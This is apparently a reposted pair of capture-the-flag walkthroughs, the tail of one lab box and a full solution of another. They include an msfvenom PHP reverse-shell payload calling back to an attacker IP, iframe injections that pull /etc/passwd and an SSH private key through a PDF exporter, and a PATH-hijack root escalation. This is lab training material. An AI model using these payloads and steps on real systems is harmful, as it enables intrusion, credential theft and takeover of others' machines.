![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-dI4AAoB-4kc/WzM6vd7B8FI/AAAAAAAAXkc/UVxEOey3jrcR03_78lK2a1PzBZNONWviQCEwYBhgL/s1600/16.png?w=687&ssl=1)
Now create an entry in filed 1 as shown.
![[Image: 17.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-HksTkjgPmpU/WzM6vUgs3mI/AAAAAAAAXks/kK61LOq-cJElH8L-SP5z7d3jrDELFRsNwCEwYBhgL/s1600/17.png?w=687&ssl=1)
Let’s create a PHP payload for injecting inside the new database. We have to use the msfvenom command for generating PHP backdoor.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw
Now copy the code from *<?php….die(); and start multi handler in a new terminal
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-ZVGvJtSzJQQ/WzM6viMCJaI/AAAAAAAAXkk/u0vakgUP-uUDIL8YqS5cBJ66nNDIK-LIACEwYBhgL/s1600/18.png?w=687&ssl=1)
GO to insert tab and Past above-copied code inside the text field given for Value.
![[Image: 19.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-CX0HbED1nUY/WzM6v2ol4SI/AAAAAAAAXko/TN3S2Z11sWIkrOAoWW29RbaGpO2kkMGtACEwYBhgL/s1600/19.png?w=687&ssl=1)
At last you will notice /var/tmp/ ninevehNotes.txt.shell.php is the Path for your database.
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-DhAdprRCAg8/WzM6wEX8RnI/AAAAAAAAXkw/GyoeE9i11doXg5R3g4sIxxLUAk4CvsU8QCEwYBhgL/s1600/20.png?w=687&ssl=1)
If you remember, we had already access admin console and observed a tab for Notes, use it to execute your backdoor.
[To see content please register here]
1
[To see content please register here]
![[Image: 22.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-S0fVdTdD5y8/WzM6wlB0pHI/AAAAAAAAXks/7EjN3tMFSGAMhxfnxyFZL1dNQM5B3LEWQCEwYBhgL/s1600/22.png?w=687&ssl=1)
Meanwhile, return to the Metasploit terminal and wait for the meterpreter session by exploiting multi handler.
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 10.10.14.25
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
1
2
3
4
5
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 10.10.14.25
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
From given below image you can observe meterpreter session 1. But the task is not finished yet, still, we need to penetrate more for privilege escalation.
meterpreter > sysinfo
meterpreter > cd /home
meterpreter > ls
meterpreter > cd amrois
meterpreter >ls
meterpreter > cat user.txt
1
2
3
4
5
6
meterpreter > sysinfo
meterpreter > cd /home
meterpreter > ls
meterpreter > cd amrois
meterpreter >ls
meterpreter > cat user.txt
![[Image: 24.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-DkFnZjPf-D4/WzM6wyYNdTI/AAAAAAAAXko/IMmNe-JrP_ARAsFz7yfav_sWcUkuULOZgCEwYBhgL/s1600/24.png?w=687&ssl=1)
Privilege Escalation
After doing a little bit enumeration we notice a directory report is owned by the user amrois and these reports were being continuously generated by chkrootkit in every minute.
With help of Google, we came to know that Metasploit contains an exploit for chkrootkit exploitation. After entering following command as shown in the given image to load exploit/unix/local/chkrootkit module then set session 1 and arbitrary lport such as 4545 and run the module.
This will give another session, as you can see we have spawned command shell of the target’s machine. Now if you will check uid by typing id it will show uid=0 as root.
id
cd /root
1
2
id
cd /root
And to see the list of files in /root type:
ls -lsa
1
ls -lsa
In the list you will see that there is a text file and read that file type :
cat root.txt
1
cat root.txt
Congrats!! We hit Goal finished both tasks and at end obtain the root access.
![[Image: 25.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-0JCv-i9CYyM/WzM6w1mKK5I/AAAAAAAAXkk/MY7aXtJYaIYzCetnCrz46b5lkGXvzmOWQCEwYBhgL/s1600/25.png?w=687&ssl=1)
Gemini Inc has contacted you to perform a penetration testing on one of their internal systems. This system has a web application that is meant for employees to export their profile to a PDF. Identify any vulnerabilities possible with the goal of complete system compromise with root privilege. To demonstrate the level of access obtained, please provide the content of flag.txt located in the root directory as proof.
Download it from
[To see content please register here]
.Penetrating Methodologies
- Scanning (Nmap)
- Abusing web application for export injection vulnerability
- Exploit web application via html iframe
- Steal SSH RSA file
- Access tty shell through ssh login
- Enumerate file having SUID bit
- Privilege Escalation
- Get root shell
- Complete the task and capture the Flag.txt
To scan our target IP we will use aggressive scan (-A)
nmap -p- -A 192.168.1.103 --open
1
nmap -p- -A 192.168.1.103 --open
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-M-hFD0A53cc/WzHYq_Rt9_I/AAAAAAAAXhU/cO0OqYyNCAIwPynhBvs1xtINFIu5G_VsQCLcBGAs/s1600/1.png?w=687&ssl=1)
As result, it figures out port 22 and 80 was open. Also found a directory /test2 When explored target IP through the web browser it put up following web page as discussed.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-_GumhUJ6n9M/WzHYs5kxF3I/AAAAAAAAXhs/zdBlJn0N6osew3x03-uKzDO45w-KEbMWQCEwYBhgL/s1600/2.png?w=687&ssl=1)
Then we explored /test2 where we read the following message for admin and also look after at the URL given here.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-GSec7GT8PR4/WzHYtmdwmFI/AAAAAAAAXh8/F1Z3_IaoEeoLp3vQ08xjB7GzJkLvml3ZACEwYBhgL/s1600/3.png?w=687&ssl=1)
Then at login form, we tried the hit-try method for login into the admin console and luckily at 5th attempt we get successful login when we submit following credential.
Username: admin
Password: 1234
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-CCHnAyVzIHM/WzHYuNz9-wI/AAAAAAAAXiA/vVllHjxWOzI5NvyPI17qcS2C99nNpjEQgCEwYBhgL/s1600/4.png?w=687&ssl=1)
After login into admin console successfully we check available action that can be performed by the administrator and here it shows the following actions.
- Edit profile
- Export profile
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-fAlpxUvc5qc/WzHYuAlmizI/AAAAAAAAXiE/BsQUMlsR60YVO5L8imQ6kvSkXGD-eKVowCEwYBhgL/s1600/5.png?w=687&ssl=1)
So we execute export profile to observe what is in actually it is exporting but could not figure out from its output as shown in below image, therefore, we decided to capture its request.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-NU8n94qWZ5s/WzHYudYYslI/AAAAAAAAXik/0CCKH39PrAM5r43L8-fNQUAJtWbqcMUdACEwYBhgL/s1600/6.png?w=687&ssl=1)
Further, with help of burp suit, we try to capture its browser request and sent the Intercepted request into the repeater and here I saw the export script possibly gave us the user profile page admin in PDF format by a tool named wkhtmltopdf.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-AAnPMbR1oAs/WzHYu37wlYI/AAAAAAAAXio/BpMAiUMwu8woec7Hju7q7QLgEqxPHCugACEwYBhgL/s1600/7.png?w=687&ssl=1)
Security breaches if the web application does not filter the user’s input, the server is exposed to several loopholes Because the most common exposures on the web, is the possibility to download an arbitrary file from a server. This state establishes a critical security issue, as it provides an attacker the ability to download delicate information from the server. For example download /etc/passwd file and so on.
We can abuse the wkhtmltopdf and try to download delicate information. Here we have written the following code for the index.php script that redirects to the any requested file.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-8N9HGM69gME/WzHYvE6XybI/AAAAAAAAXis/0GIf8SZP-BIb786k1RQSMDZvFlrs7b3tQCEwYBhgL/s1600/8.png?w=687&ssl=1)
In order to transfer it into the victim’s machine, therefore, we launch the PHP server for file transfer.
php -S 0.0.0.0:4444
1
php -S 0.0.0.0:4444
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-jn2KZAVNyZM/WzHYvXaiSBI/AAAAAAAAXiw/qmA1kqeAIZ0HQsNa4j8YqKL3X3HhBJnbwCEwYBhgL/s1600/9.png?w=687&ssl=1)
We got a hint for export injection from this source:
[To see content please register here]
and its on the basis we proceed for the following steps.Now go with Action -> edit profile
Then injecting the following HTML code inside the text field given for the Display name
<iframe height="1000" width="800" src="http://192.168.1.108:4444/?file=/etc/passwd"></iframe>
1
<iframe height="1000" width="800" src="http://192.168.1.108:4444/?file=/etc/passwd"></iframe>
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-u5b0yu1XLqI/WzHYqxTPN6I/AAAAAAAAXic/7bX4LTxmcqEcZ62U1tELZAVDyqyp0621ACEwYBhgL/s1600/10.png?w=687&ssl=1)
Now go with Action -> export profile
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-wg6N3HxsI68/WzHYq-shNQI/AAAAAAAAXiY/x3xGEXWodOgbMfqIafDjaGyuCHSn6li9ACEwYBhgL/s1600/11.png?w=687&ssl=1)
TERRIFIC!!!! It stands on our expectation and we have /etc/passwd file in front of us. here we can clearly observe UID GID 1000 for user: gemini1.
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-2Kid1vYoCZI/WzHYr_xzHWI/AAAAAAAAXis/mHiLtEI9Q3kJWBjc48F5pDfh8Y-XODThQCEwYBhgL/s1600/12.png?w=687&ssl=1)
From nmap scan result we had seen there was a hint for SSH RSA key and we also knew the first username of this VM, therefore let’s try to export RSA file.
Now go with Action -> edit profile
Then injecting the following HTML code inside the text field given for the Display name
<iframe height="1000" width="800" src="http://192.168.1.108:4444/?file=/home/gemini1/.ssh/id_rsa"></iframe>
1
<iframe height="1000" width="800" src="http://192.168.1.108:4444/?file=/home/gemini1/.ssh/id_rsa"></iframe>
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-Wgf1L6-t59Y/WzHYr5KImUI/AAAAAAAAXig/T_0vWOKw36EtX1Si8DwtPbPt2g3-l_jPACEwYBhgL/s1600/13.png?w=687&ssl=1)
Now go with Action -> export profile
Feeling Incredible just after observing the following result, download it quickly.
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-BEgBokHlFxs/WzHYsDDyWwI/AAAAAAAAXio/TgGbraBogRkKt7TFNeRvl6h185Oi9vXLQCEwYBhgL/s1600/15.png?w=687&ssl=1)
With help of downloaded RSA, file connects to victim’s VM via ssh.
ssh -i login_rsa [email protected]
1
ssh -i login_rsa [email protected]
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-O3PXbAps5zc/WzHYs6bB2KI/AAAAAAAAXik/jzlVyUn07zka7KpySx1G5Ob6JLLCyV4RgCEwYBhgL/s1600/16.png?w=687&ssl=1)
Then without wasting your time search for the file having SUID or 4000 permission with help of Find command for post exploitation.
find / -perm -u=s -type f 2>/dev/null
1
find / -perm -u=s -type f 2>/dev/null
Here we can also observe an interesting file/usr/bin/listinfo having suid permissions. And after exploring this file we notice it probably running netstat and date. Hence we can escalate privilege by exploiting environment PATH Variable, you can take help of our article from
[To see content please register here]
to know more about it.![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-DDPFEXTNxc0/WzHYtPc8fCI/AAAAAAAAXic/1bdFQTduSPQOW922HqdXUl9xgFPQ5d7EgCEwYBhgL/s1600/17.png?w=687&ssl=1)
cd /tmp
echo "/bin/sh" > date
chmod 777 date
echo $PATH
export PATH=/tmp:$PATH
/usr/bin/listinfo
1
2
3
4
5
6
cd /tmp
echo "/bin/sh" > date
chmod 777 date
echo $PATH
export PATH=/tmp:$PATH
/usr/bin/listinfo
As you can observe after that we execute id command and accomplished by root id.
![[Image: 25.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-ruMb8O5P4lI/WzHYtae2qUI/AAAAAAAAXiw/1IFlibixFCoHPUwYat8aXm5k8qXK4XcLQCEwYBhgL/s1600/25.png?w=687&ssl=1)
As you can observe after that we execute id command and accomplished by root id. Now let’s finished this task by capturing the flag.txt flag from the inside root directory.
cd root
ls
cat flag.txt
1
2
3
cd root
ls
cat flag.txt
![[Image: 26.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-77UG680bV8s/WzHYtc5ZUSI/AAAAAAAAXig/Q6qBWLeicdULNzM7ZAVt1pLSO2C6QY2wACEwYBhgL/s1600/26.png?w=687&ssl=1)
